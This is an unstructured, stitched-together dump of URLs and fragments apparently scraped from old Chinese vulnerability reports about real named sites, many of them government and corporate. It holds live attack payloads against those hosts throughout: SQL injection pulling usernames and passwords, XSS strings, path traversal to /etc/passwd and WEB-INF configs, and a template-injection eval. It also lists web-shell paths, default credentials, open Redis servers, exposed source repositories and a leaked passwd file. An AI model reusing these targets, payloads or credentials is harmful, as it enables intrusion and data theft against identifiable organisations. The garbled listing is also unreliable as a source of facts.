http://footprint.cws.api.sina.com.cn/del.php?pid=1&uid=[UID参数]&deleteuid=[被来黑的UID参数]&inblack=1&varname=requestId_71119117 http://bbs.baofeng.com/tools.php https://gzgjj.gov.cn/wsywgr/LoginAction!login.action http://data.2010.sohu.com/player/ajax/player_list.ajax.php?team_id=201 android:exported的值,其android:exported取的是默认的值:true,导致任意第三方App都可以调用此接口,读取浏览器中的任意私有文件信息。 http://lashou.com/account/reset?code=MTg2***5Mjg0MDR8bml***wNjIzfDU0MzAwNTc5MkBxcS***18MTM4ODEwNzg3NnxkNTdhOG****MzYyZjI4MzVmMTE4MWYx***yMDc0Yw%3D%3D http://lashou.com/account/resetreq http://www.xyfdc.gov.cn/htmlaspx/fydj/qg_issue.aspx?code=797767 http://u.china.com/account/find.php?_a=search_more&city_id=810100 http://u.china.com/account/find.php?_a=search_more&username=%27&usermail= http://www.51maipiao.cn/ http://www.ecbs.cn/index.php/module/action/param1/$%7B@phpinfo%28%29%7D http://hdwx.114chn.com/sm/Default.aspx http://srm.tclking.com/ http://59.33.249.38/vmi/WebService/WS_Login.asmx/Login www.now.cn/pay/outport.net http://en.ployer.cn/mid_detail.php?id=13 http://cofcomag.cofco.com/cn/periodical/old.aspx http://cofcomag.cofco.com/cn/periodical/old.aspx http://cofcomag.cofco.com/cn/periodical/old.aspx http://bgy.ata.net.cn:7943/CUST01reg/Report/ExamRegisterReportInfo.aspx?ID=00223&RandomSet=0.8303370408577311 http://bgy.ata.net.cn:7943/CUST01reg/Report/C_WebImage.aspx?id=700019 http://bgy.ata.net.cn:7943/CUST01reg/Report/C_WebImage.aspx?id=841126 http://vt.shengdian.eol.cn/2012/itemlist.php?itemid=6 http://blog.39.net/admin/photosload.aspx http://q601333.duapp.com/ redis:220.181.11.182:6379 redis:220.181.11.183:6379 redis:220.181.11.184:6379 redis:220.181.11.185:6379 redis:220.181.11.54:6379 redis:220.181.118.144:6379 redis:220.181.118.182:6379 redis:220.181.118.183:6379 redis:220.181.118.59:6379 redis:220.181.118.73:6379 redis:220.181.19.11:6379 redis:220.181.19.139:6379 redis:220.181.19.152:6379 redis:220.181.2.172:6379 redis:220.181.2.173:6379 redis:220.181.2.174:6379 redis:220.181.2.64:6379 
redis:220.181.89.41:6379 redis:220.181.89.52:6379 redis:220.181.89.63:6379 redis:220.181.61.193:6379 redis:220.181.69.127:6379 www.xcslw.com/User/detail.aspx?order_id=order_id编号 http://claims.lenovo.com http://claims.lenovo.com/Claim/PrintPartInformation.aspx?ClaimId=9990540964&PartNumber=45N7321&Notes http://wooyun.org/bugs/wooyun-2010-041564 http://passport2.pcauto.com.cn/passport2/api/activate.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D88B03B2BB4DBCCA807DADED7EBBDDA38E3E4856A85E254A28-31269713&url=http%3A%2F%2Fmy.pcauto.com.cn%2Fpassport%2Factivate_done.jsp http://my.pconline.com.cn/passport/reset_password.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D8252F925C0FD13AEE-31269713 http://multimedia.tcl.com/administrator/ http://tcm.iquanyou.com.cn/tcm/userLogin.action http://hudong.moc.gov.cn:2517/opinion http://jtsjy.moc.gov.cn:88/indexAction.do http://hudong.moc.gov.cn:2517/opinion/display/fillForm.jsp?topicID=118 http://www.cjnh.gov.cn/ http://www.cjnh.gov.cn:6666/status?full=true http://zzmetro.cn/ http://zzmetro.cn/adminindex.jsp http://zzmetro.cn/jsptest.jsp http://2012b2c.juneyaoair.com/ http://2012b2c.juneyaoair.com/crmInterLogin.do http://2012b2c.juneyaoair.com/resetPwd.do http://www.fyair.com http://www.yite.com/custom.php?cid=3 http://www.yite.com/sinfo.php?id=94 http://www.yite.com/info.php?id=4 http://www.yite.com/my_news_info.php?id=93 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://hot.yn.189.cn/vote/view/index.jsp http://hot.yn.189.cn/test1/ http://125.65.165.8:7001 http://219.153.32.161/ http://cms.yegame.com/wap.php http://cms.yegame.com/yegame_master/login.php http://59.151.39.183/eee http://kefu.linekong.com/web-console http://tools.linekong.com:8080/ http://59.151.49.39:7080/web-console http://59.151.49.36/web-console/ http://218.106.133.58/ehr 
http://www.12306.cn/otn/confirmPassenger/getPassengerDTOs http://218.106.133.143/sigma/chkmess.asp?messid=52 http://218.106.133.149/Default.aspx http://www.ttkdex.com/houtai/adminlogin.jsp http://www.ttkdex.com/ChatRoom/forum/main.jsp http://mail.ttkd.cn/ http://cts.tcl.com http://cts.tcl.com/AjaxHelper/AjaxHelper.aspx?method=login&PassWord=e&UserName=e www.tclbusiness.com http://0day5.com/archives/933 www.tclbusiness.com http://weather.hsw.cn/aiqiang/index.php?a=add&fid=1贴个字条 http://jifen.360.cn/index/lotteryrich.html http://www.cyty.cn/yongzhuangshengdian/tuji.php?id=14 http://www.cyty.cn/yongzhuangshengdian/tuji.php?id=14 http://www.gzrailway.com.cn/ http://www.jntlj.com/cx_more.aspx?type=zgyy http://www.jntlj.com/cx_nr.aspx?type=JTXW&id=6653 http://zhangheng.v2.taodiantong.cn http://202.109.187.112/license!getExpireDateOfDays.action http://tech.tcl.com/cmd.asp http://zhangheng.v2.taodiantong.cn http://zhangheng.v2.taodiantong.cn注册一个账号111111@111.com http://218.106.133.55 http://218.106.133.54 http://218.106.133.54/console weblogic:weblogic直接进入。 http://localhost:81/startbbs/index.php/admin/users/edit/4 http://218.106.133.143 http://218.106.133.143/sigma/download.asp?freq=126&id=1 http://house.china.com.cn/ASPX/Photo/HousePhotoList.aspx?PhotoID=724652 http://api.xianguo.com/i/views/version.json?key=36d979af3f6cecd87b89720d3284d420&udid=860755000000000&version=64&devicetype=5 http://lhb.265g.com/2013/ http://lhb.265g.com/2013/g3513.html http://fahao.265g.com/181157.html gov.user/index.php http://s.etao.com/search?q=%22%3e%3ca+href%3D%22x%22%3e%3cimg+src%3Dx+onerror%3Dalert%28%2Fx%2F%29%3e%2F&initiative_id=setao_20131229&style=grid&qservice=s1&page_tab=haiwai&tbpm=20131229 http://s.etao.com/search?q= http://www.cnblogs.com/haibindev/archive/2011/10/17/2214518.html http://pdscore.pconline.com.cn/.svn/text-base/uppPriceList.jsp.svn-base http://pdscore.pconline.com.cn/.svn/text-base/index.htm.svn-base http://pdscore.pconline.com.cn/.svn/text-base/logon.jsp.svn-base 
http://pdscore.pconline.com.cn/.svn/entries http://pdscore.pconline.com.cn/CVS/Root http://pdscore.pconline.com.cn/.svn/entries http://sports.163.com/13/1224/08/9GRLN4QJ00051C8U.html kf2.coolpad.cn/upload.php http://59.46.220.76/components/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp http://www.syneuedu.com/page.action?mark=Skillbase&mid=77&pid=61 http://www.langlib.com:28017/ http://125.89.68.104/report/front/main/showAll.action http://yzc.ccwsj.gov.cn:8080/medicine/login.action http://www.fqw8.com/web.rar http://i.s1979.com/home.php?mod=space&uid=2&do=profile获得uid为2的管理员用户名qinrl; http://59.61.88.234:8080/ http://weibo.com/u/3022690473欢迎收听我的微博!# http://bbs.g.1ting.com/uc_server/admin.php http://www.jckc.gov.cn/zxft.php?classid=20&id1=%20classid=20 http://www.jckc.gov.cn/sqmy04.php?classid=184 http://jckc.gov.cn/dzcs/show.php?id=10也存在注入: http://60.28.193.157:9080/login.jsp?url=%2Findex.jsp http://59.151.89.7:8084/.svn/entries http://59.151.89.7:8084/pay_lashou/.svn/entries http://59.151.89.7:8084/crmlashou/.svn/entries http://59.151.89.7:8084/client_lashou/.svn/entries svn://10.168.31.52/pay_lashou/crmlashou svn://10.168.31.52/pay_lashou svn://10.168.31.52/pay_lashou/pay_lashou svn://10.168.31.52/pay_lashou http://59.151.89.7:8084/pay_lashou/index.php?c=login& http://59.151.89.7:8084/crmlashou/index.php?c=login& http://59.151.89.7:8084/client_lashou/index.php?c=login& http://home.4games.com/ http://lccb.guet.edu.cn/upload5x/ http://lccb.guet.edu.cn/zecmd/ http://124.127.255.63/ http://www.fumu.com/api/js.php?tagname=[2012]通用美图热赏&piccatid=11101 http://www.scrftb.gov.cn/ http://www.scrftb.gov.cn/SearchList.aspx?s=a cs:108 http://115.182.51.86,使用了开源程序phpcms2007 http://115.182.51.86/movie/onunload.php?serverid=1 http://www.ygshangjie.com http://www.ygshangjie.com/plus/mytag_js.php?aid=9090 http://www.eboss.cn/ http://www.eboss.cn/weichen.txt http://yingshi-v2.114la.com/?ac=enjoy_detail&id=3 
http://220.181.154.216:8080/ http://app.114la.com/jidanci/?ac=jiyi_json&cikuid=7&startid=5&pre=0 http://selfservice.ikuai8.com/漏洞在这个站点,本意是上网用户登陆页面的云端设置,却造成了一个存储型XSS的诞生 http://report.lenovo.net/Login.aspx http://report.lenovo.net/FindPassword.aspx http://hscms.net/ http://www.Sxtm.com http://www.snfox.com/ http://www.zjcz.net.cn/ www.wenmingwangzhan.cn http://office.yyedu.gov.cn/login.action?backURL=http%3A%2F%2Foffice.yyedu.gov.cn%2Findex.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin 
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin winupon:x:500:500::/home/winupon:/bin/bash http://218.14.88.21/ http://crmreport.tv.tcl.com/WebReport/ReportServer?op=resource&resource=/etc/passwd http://218.14.88.20/DRP/login.action http://218.14.88.13/DRP/login.action http://www.digitalchina.com.hk/c/ir_results.php?year=2013 http://www.digitalchina.com.hk/c/ir_bod_details.php?id=176477 http://www.digitalchina.com.hk/c/product_details.php?id=8401 http://ac.ip126.com/ http://ac.ip126.com/data/%23ttgq.asp http://e.edayshop.com/xt/ys/EDSC006/admins/index.asp http://e.edayshop.com/xt/ys/EDSC006/admins/upload_flash.asp?formname=bd&editname=tp&uppath=../tp&filelx=jpg http://www.jeanswest.com.cn和http://www1.jeanswest.com.cn貌似是一样的 http://www1.jeanswest.com.cn/glorious/advjob/job_view.asp?id=112 ftp://211.144.213.114 http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday: http://taobao.fumu.com/flash_upload.php?modelid=1 http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday: http://taobao.fumu.com/comment/comment.php?action=vote http://taobao.fumu.com,和主站一样使用了phpcms2008,0day先不放,先试试Nday: http://taobao.fumu.com/yp/business/index.php?file=../../admin/block&action=post&blockid=eval&template=%3C?php%20phpinfo%28%29;exit%28%29;?%3E http://pscm.lenovo.com.cn http://pscm.lenovo.com.cn/defaultframe.htm?r=/logistics/quality/ntf/ntftestquery/default.htm&user=C17913 http://ss.thinkworld.com.cn http://www.feiren.com/ http://ffp.airchina.com.cn/cn/member/EmailStatement.jsp?mid=001183834512&beginMonth=20130101&endMonth=20131129 url:http://www.shengyuan.com/index.php/web_api/articleHDList/0 http://ffp.juneyaoair.com/ http://ffp.juneyaoair.com/ http://mall.juneyaoair.com/ http://www.juneyaoair.com/ http://60.28.196.107 test:test 
http://222.186.64.169/yzhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=ebf6565f-3fd8-4586-b413-4bbf2667e7b6&ClientType=13&ModuleType=8102 http://www.ycztb.com/ycsite/consultant/showresault.aspx?ShowLsh=0&Mlsh=609563 http://www.czzbcg.com/czhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=9cb37289-4ab2-4929-aa46-993e539e91fb&ClientType=13&ModuleType=8102 http://www.txcetc.com:6920/txhy/BackEnd/AttachManage/AttachView_Single.aspx?CliengGuid=6e279cde-d5a3-43bd-92ad-58d0ffa2d7c1&ClientType=13&ModuleType=8103 http://www.pbc.gov.cn:8080/%c0./WEB-INF/classes/applicationContext.xml http://www.pbc.gov.cn:8080/.%ae/WEB-INF/classes/applicationContext.xml http://ffp.juneyaoair.com/member/customerInfo.jspx http://www.juneyaomall.com/member/receiverProductInfoList.jspx http://mall.juneyaoair.com/member/receiverProductInfoList.jspx http://tianqi.114la.com http://tianqi.114la.com http://ncztb.jiangxi.gov.cn/ncztb/webservice/UserManageService.asmx http://tempuri.org/GetAllUser soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://www.hbggzy.cn/hubeiyewu/webservice/AjaxUpload.asmx www.hbggzy.cn http://tempuri.org/UploadData soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope http://dlx.lenovo.com/DLXSite/Logon.aspx http://dlx.lenovo.com/dlx3/DLX.SFR.Web/UI/StoreFront/Visualize/D0000012.asp;.Visu.jpg http://club.sohu.com//message/send_sig_message.php?receiveCN= http://ixss.in//24yLKt?1388480103 http://cnrdn.com/yQqC http://sys.gz.soufun.com http://youxue.xdf.cn,注入点: http://m.youxue.xdf.cn/pic/index?lineid=dae56ce8-e06f-b666-4ec0-123a4818f34b http://m.youxue.xdf.cn/diary/index?lineid=dae56ce8-e06f-b666-4ec0-123a4818f34b 
http://www.lzfg.com.cn/tt/page/attachfile_upload.asp?savepath=E:\bit-service\tt\ http://110.167.173.115/TT/Page/attachfile_upload.asp?savepath=D:\bit-service\tt\ http://weibo.com/u/3022690473欢迎收听我的微博!# http://amarket.channel.gfan.com/system/LoginAction!login.action# http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=34 http://www.zycms.cn/zf/upfile.asp http://support.zte.com.cn/admin http://www.buick.com.cn/lacrosse/buickcommentdetail.aspx?actionid=130 http://rsj.km.gov.cn/jsp/rsjldxx/showinfo.jsp?id=5862 cn:8004/map/clientXML http://www.yungoucms.cn/?/s_tag/ https://box.lenovo.com/.svn/entries http://doityourway.lenovo.com/.svn/entries http://thinkpadtablet.lenovo.com/.svn/entries http://www.jzhb.gov.cn/ http://www.bjnsf.org/nsf_wlhxxgzpt/ http://59.151.98.212/bjnsfexpert/expertReginfo.do?method=loginCheck http://ccidstudy.ccidnet.com/data/uploads/13885780381.php http://www.pingyao.gov.cn/ http://www.pingyao.gov.cn/dt3/wssb/show_question.asp?id=100005664 http://club.suning.com/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://my.3454.com/flash.php?ac=play&fgid=20 http://xxgk.pingyao.gov.cn/search.asp?search=1 http://oa.pingyao.gov.cn/ http://tieba.baidu.com/managerapply/apply?kw=ww http://www.cba.gov.cn/ http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008 http://www.cba.gov.cn/cbastats/wcba/teamdetail.aspx?id=WTe004 http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008'%20and%20'a'='a http://cba.gov.cn/cbastats/teamdetail.aspx?id=Te008'%20and%20'a'='b http://www.cba.gov.cn/cbastats/wcba/calendarsearch.aspx?startshift=4&endshift=19&teamno=WTe004 http://partner.funshion.com/partner/query_binding_config.php?channel_id=103261 http://www.changyang.gov.cn/phpmyadmin/ http://www.cy12333.gov.cn/admin/ http://job.shenzhenair.com/recruitment/index/newslist/jt/2/newstag/x1*/ http://www.xljcg.net/xljcg.rar http://www.xljcg.net/cp/class/?6.html&showtj=1 
http://www.xljcg.net/news/class/index.php?0.html&page=2&showtj=&showhot=&author=&key= http://site2.v5shop.com.cn/vpro_standred/。铺面而来的是 http://www.zdor.cn/frendlinks.php?do=list&id=15 ftp://122.72.12.37/data/ http://122.72.12.191/ http://122.72.0.190:8080/ http://122.72.1.164/ http://122.72.1.164:8080/login http://122.72.1.188:8080/login http://hz.zhujia360.com/zhishu/list?forum_id=32&szg=2&price=40 http://116.213.114.13:8080/se/queryindexdata.do http://www.tp-link.com.cn/cms/main.aspx,并修改http://smb.tp-link.com.cn分站内容。 http://www.tp-link.com.cn/cms/editsmbstory.asp?action=edit http://hd.chinatax.gov.cn/jzxx/login/find-password.jsp http://www.sanyuan.com.cn/data/js.php?id=9 http://www.sanyuan.com.cn/flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20trx_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 http://hz.zhujia360.com/zhishu/pk/ids/363_52 http://www.bdtyj.gov.cn/web.rar http://www.bdtyj.gov.cn/Admin1982/Login.asp http://webservices.99inn.cc/ https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn?randCode=8rhw) http://www.maipu.cn/manage/Login.aspx http://117.121.55.210:81/index.php/login http://t.keepc.com/test.php http://wap.keepc.com/phpinfo.php http://www.keepc.com/down.act?pv=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://www.keepc.com/w/ph8i.c?uaType=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://p.keepc.com/v1/p1/i.c?c=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://t.keepc.com/tp/nc.act?a=9&c=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&t=new http://wap.keepc.com/register/register.php?act=reg&rand=676675&sid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://wap.keepc.com/register/register.php?act=reg&sid=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://support.keepc.com/feedback/list.action?feedback.productId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E 
http://support.keepc.com/feedback/feedback/submit.action?feedback.productId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://support.keepc.com/feedback/feedback/list.action?feedback.productId=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://union.keepc.com/resources/images/title_t1.gif/00.php http://mp.haitangshow.com/ http://agri.suning.com.cn/ http://m.wxcsmz.com/dypq/wap/movie/movie!index.action http://m.wxcsmz.com/dypq/j.jsp http://m.wxcsmz.com/dypq/ssh2.jsp http://admin.monternet.com/1860/ http://dgfbh.soufun.com/news/admin.asp passwd:admin http://kf.kongzhong.com/faqslist.php?id=7 RT:21Cn http://secaqb.anquanbao.org/sqlin.php?id=9 http://61.135.185.214/ www.baidu.com..\..\..\..\..\..\..\windows\system32\cmd.exe http://service.v5shop.com/Help.aspx?id=460 http://service.v5shop.com/list.aspx?shopname=V5Shop%B1%EA%D7%BC%B0%E6 http://*******/cms/app/info/doc/index.php/15145 http://*******/cms/app/info/doc/index.ph??pCatBodyId=15145 http://*******/cms/app/admin http://211.137.133.80/csp/kbs/displayKnowledgeFirstPage.action http://wenwen.soso.com/z/ShowUser.e?sp=1f27a3562e8b06e740c0d3c609b9adf3&ch=2013ww.tw.r.tjzj http://agent.21cn.com/drp/trial/trial_entmail_domain_check.jsp?domain= youxue.xdf.cn/main/ajax/getlinecommentlist youxue.xdf.cn/main/ajax/getlinepiccommentlist youxue.xdf.cn/main/apionlinesignu/getcamptimedropdownbycountryidandlineidanddepartcity youxue.xdf.cn/main/blog/_bloglist youxue.xdf.cn/main/diary/_diarylist youxue.xdf.cn/main/linechannel/getlinelistbysearch youxue.xdf.cn/main/linechannel/index youxue.xdf.cn/main/linechannel/_speciallinelist youxue.xdf.cn/main/linechannel/_summerlinelist youxue.xdf.cn/main/showpictures/ajaxgetlineinfoandpicinfo youxue.xdf.cn/main/showpictures/index youxue.xdf.cn/main/showpictures/picdetail http://youxue.xdf.cn/main/apionlin http://demo.kweb800.com/v12/Edit/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp 
http://www.bjsupervision.gov.cn:8080/caphtjcj/reportForm/querycasereply.action?reportForm.backNum=&reportForm.phoneNum=XXXXXXX http://219.134.88.6/ http://219.134.88.6/shell.asp http://hr.shenzhenair.com http://eshipping.ca-cargo.com/Default.aspx http://www.diycdn.com/diycdn.rar http://www.diycdn.com/admin_DiyCDN/login.asp http://www.myhack58.com/Article/html/3/62/2012/35468.htm http://shop.tompda.com/mall/zj/index.asp http://s.tompda.com/ http://app.edu.ifeng.com/college/.svn/entries http://control.blog.sina.com.cn/blog_rebuild/riaapi/profile/note/notewalladd.php?domain=1 http://control.blog.sina.com.cn/blog_rebuild/riaapi/profile/note/notewalladd.php?domain=1 http://others.enet.com.cn/research/research_result.php?id=2010 mydomains.com/baidu','104857600S','1','2013-12-31 mydomains.com/../',0,1048,0,1,0,0 http://www.eallcn.com/newsdetail.php?id=12498 http://oa.cqmcd.com:8089/admin/存在弱口令,mssql弱口令 http://2012.moban.siteserver.cn/siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=a'%20and%201=@@version%20and%201='1 http://116.52.13.46/dwhnjsy.asp http://116.52.13.46/ynnj2012/Application/QiYeTuiJjxs.aspx http://www.yt10010.com/lt/web/index.aspx http://126.am/AphOJ0 http://flfw.smesd.gov.cn/view.jsp?id=147812 http://eb.elong.com/ForgetPass.html http://wooyun.org/bugs/wooyun-2013-017858 data:text/html;base64,PHNjcmlwdD5hbGVydCgiaGFjayBieSBweDE2MjQiKTwvc2NyaXB0Pg== http://search.spp.gov.cn/was40/index_was40.jsp http://search.spp.gov.cn/was40/search?channelid=19807 http://search.spp.gov.cn/was40/passwd/passwd.htm http://zzszxt.jxedu.gov.cn/t/front/login.action http://tks.ylgt.gov.cn/Database/SiteWeaver.mdb http://tks.ylgt.gov.cn/admin/admin_login.asp http://www.cnpostair.com/yndt.asp?id=155 http://www.71jiu.com/myshop/mb6/index.php?id=56 http://mall.jinjiang.com/admin/Index.aspx http://webpro.jxedu.gov.cn/zccSs/ http://218.25.79.218/syyj/Emergency/时可直接查看到网站文件,然后随便看了一下,网页程序验证不严导致可获得管理员账号密码。 
http://218.25.79.218/syyj/Emergency/ManageResources/Expert/Expert.aspx?expertId=151 http://218.25.79.218/syyj/Emergency/ManageResources/Expert/Expert_Edite.aspx?expertId=151 http://218.25.79.218/syyj/Emergency/ManageResources/RescueTeam/RescueTeamManageView.aspx救援队人员详细列表 http://218.25.79.218/syyj/Emergency/ManageResources/Car/CarView.aspx http://218.25.79.218/syyj/Emergency/ManageResponse/EventCheck.aspx http://218.25.79.218/syyj/Emergency/ManageResponse/EvenCheck.aspx http://218.25.79.218/syyj/Emergency/Security/Powers/UserInfoList.aspx http://218.25.79.218/syyj/Emergency/ManageVideo/yutu30Video/yutu30.html http://www.hydron.com.cn/classroom.php?curr_page=eyeshield&type=1 http://www.hydron.com.cn/classroom.php?curr_page=eyeshield&type=1 http://hr.nd.com.cn/FAQ.aspx?ft=2 http://www.scal.com.cn:88/manager/html http://oa.99inn.cc/longincheck.php X-FORWARDED-FOR:127.0.0.1"* http://mb.hainan.gov.cn http://mb.hainan.gov.cn/test.jsp http://www.weekedu.com http://www.asxf.gov.cn/wsxf/manage/login.asp http://www.zjjygsj.gov.cn/web.rar http://www.zjjygsj.gov.cn/admin/Admin_Login.asp http://kyfw.12306.cn/otn/confirmPassenger/autoSubmitOrderRequest提交获取到一个订票的钥匙及余票信息 http://kyfw.12306.cn/otn/confirmPassenger/getQueueCount提交获取席别信息 http://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue确认订票信息 http://www.chevrolet.com.cn/red_chalk/city.ashx http://211.151.99.41 http://222.222.121.167/ http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSaveProfile http://websites.imqq.com/go/1004/aHR0cDovL3d3dy5tYWljaHVudGFuZy5pbmZv/from/websites https://passport.baidu.com/?getpassindex http://61.135.207.218/wsgi/login http://my.39.net/UserCenter/default.aspx http://zhibo.m.sohu.com http://zhibo.m.sohu.com/r/2513/ http://sim.shenzhenair.com:8000 http://sim.shenzhenair.com:8000/UserFile/ASPXspy2.aspx http://www.91rpg.com/system/top.htm http://www.91rpg.com/system/left.htm http://www.91rpg.com/system/ http://mhzc.91rpg.com/admin/left.htm http://djj.91rpg.com/admin/left.htm 
http://sxd.91rpg.com/admin/left.htm http://sq.91rpg.com/admin/left.htm http://blcx.91rpg.com/admin/left.htm http://xlfc.91rpg.com/admin/left.htm http://long.91rpg.com/admin/left.htm http://hzw.91rpg.com/admin/left.htm http://www.expsky.com/admin/left.htm http://www.expsky.com/admin/top.htm http://union.pipi.cn/ http://218.94.30.9/2013njbt/Application/QiYeTuiJjxs.aspx(江苏省)的验证: http://211.151.230.205/在线学习平台的问题。 http://211.151.230.205/fckeditor/editor/filemanager/connectors/uploadtest.html http://218.12.43.170/hbagri/.svn/entries http://svn.6636.net:9080/svn/unicomagri/branch/hbagri3/web http://svn.6636.net:9080/svn/unicomagri http://www.startbbs.com/comment/edit/1/1/1 http://www.startbbs.com/comment/edit/1/1254/3888 http://www.startbbs.com/follow/add/2587 http://www.startbbs.com/follow/add/2587 http://www.startbbs.com/follow/add/2586 http://www.yanbian.gov.cn/ http://svip.club.sohu.com/learning/ceeonline/ques.php?item_id=444 http://svip.club.sohu.com/learning/ceeonline/ques.php?item_id=444 http://127.0.0.1/?p=5 http://top.30edu.com/也可以查到一些排名在前的站长的网校号 http://www.u17.com/z/anime/10w/news/news_list.html?cate_id=3 http://www.zjwsbs.gov.cn/portal/ServiceItemInfoAction.action http://web.lkgame.com/ServiceCenter http://www.zyrc.com.cn/per/per_condi_list.asp http://www.zyrc.com.cn/dyzc/manager/index.asp http://www.sxgxt.gov.cn/indexAction.do?dispatch=AccountLogin http://bbs.siteserver.cn/ http://ico.58pic.com/ajax/insertword?w= http://www.jscons.gov.cn/jscons.rar http://www.jscons.gov.cn/jscons/images/007.asp;.jpg http://www.jslottery.com/manage/fckeditor/editor/skins/default/images/toolbar.end.asp;1_2.gif http://www.tuutao.com/index.php http://www.tuutao.com/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000 http://www.hp1997.com/ http://admin.hp1997.com/ http://www.ccmids.cn/phpmyadmin http://www.duomi.com/.svn/entries https://frontier.taiy.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.jin.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp 
https://frontier.huhht.12306.cn/gateway/hydzsw_test1/Dzsw/login_bur.jsp https://frontier.harb.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.qingz.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.nann.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.chengd.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.nanch.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp https://frontier.xian.12306.cn/gateway/hydzsw_test1/Dzsw/login_bur.jsp https://frontier.wuh.12306.cn/gateway/hydzsw/Dzsw/login_bur.jsp http://mldzpk.111g.com/login.php?xn_siteid=1&ap http://www.webluker.com/webtools/dns http://www.zsb.pudong-edu.sh.cn/CenterWeb/czzs/Info.asp?id=1208 http://www.digitalchina.com.hk/c/news_business.php?year=2010 http://www.digitalchina.com.hk/c/product.php?id=2 http://www.digitalchina.com.hk/c/ir_report.php?year=2012 http://www.digitalchina.com.hk/html/news_business.php?year=2010 http://www.digitalchina.com.hk/html/product.php?id=2 http://www.digitalchina.com.hk/html/ir_report.php?year=2012 http://read.beifabook.com/admin/modes.aspx http://read.beifabook.com/admin/left.aspx http://localhost:81/guestbook.aspx 